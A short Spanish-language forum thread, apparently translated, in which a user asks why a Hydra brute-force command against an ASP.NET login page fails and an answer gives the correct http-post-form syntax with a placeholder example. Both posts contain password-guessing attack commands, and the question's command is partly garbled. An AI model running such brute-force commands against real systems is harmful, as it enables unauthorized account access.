Fuerza bruta usando hidra

0

Intento realizar un ataque de fuerza bruta en un sistema y tengo una lista completa de palabras de las posibles contraseñas porque usan un formato muy simple, pero cuando probé la hidra con las siguientes respuestas al post, me dio un error al decir que

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-19 22:02:39 [ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: /Connect/Login.aspx

¿Alguna idea de cómo solucionar esto?

  

hydra -l A23432 -P wordlist_1.txt -s 80 -V 0.0.0.0 http-post-form "/Connect/Login.aspx:__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%%2BzLZA8Z%2BnkUqzz3%2 % 3D & __ VIEWSTATEGENERATOR = 125EDFF6 & __ Anterior = eic2obM9HsJVGXjCuBkW_BCXDoR6wcOVTcJrExElqVWm-b3vnFcneVi-Yc52SWRk3vuSeeDAj6xlnRF9h5rqjDrO5hURRKbSQ_cRyvIHbRX7ss3b0 & __ EVENTVALIDATION =% 2FwEWCQLqlo7JBQKVjO6OBwLzw% 2BOgBQLA% 2FraSCQKd2bA2ApyI9v8JAv2ao% 2BgDAqebmbQDAujk6qkJVYCk1DwUcL4617 gtTeSpx0D105E% 3D & ctl00% 24ContentArea% 24txtUserName = ^ USUARIO ^ & ctl00% 24ContentArea% 24txtPassword = ^ PASS ^ & ctl00% 24ContentArea%

    
pregunta user3501673 20.01.2016 - 05:11
fuente

1 respuesta

1

Debes proporcionar la sintaxis correcta. Aquí hay un ejemplo:

hydra [TARGETIP] http-form-post "/TARGETPATH/TARGETPAGE.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
  • 1er campo (antes del 1er punto) = ubicación de la página de destino
  • segundo campo (antes de la segunda colon) = usuario & parámetros de contraseña
  • tercer campo (después de la segunda coma) = respuesta de página en intento de inicio de sesión incorrecto
respondido por el mk444 20.01.2016 - 05:59
fuente

Lea otras preguntas en las etiquetas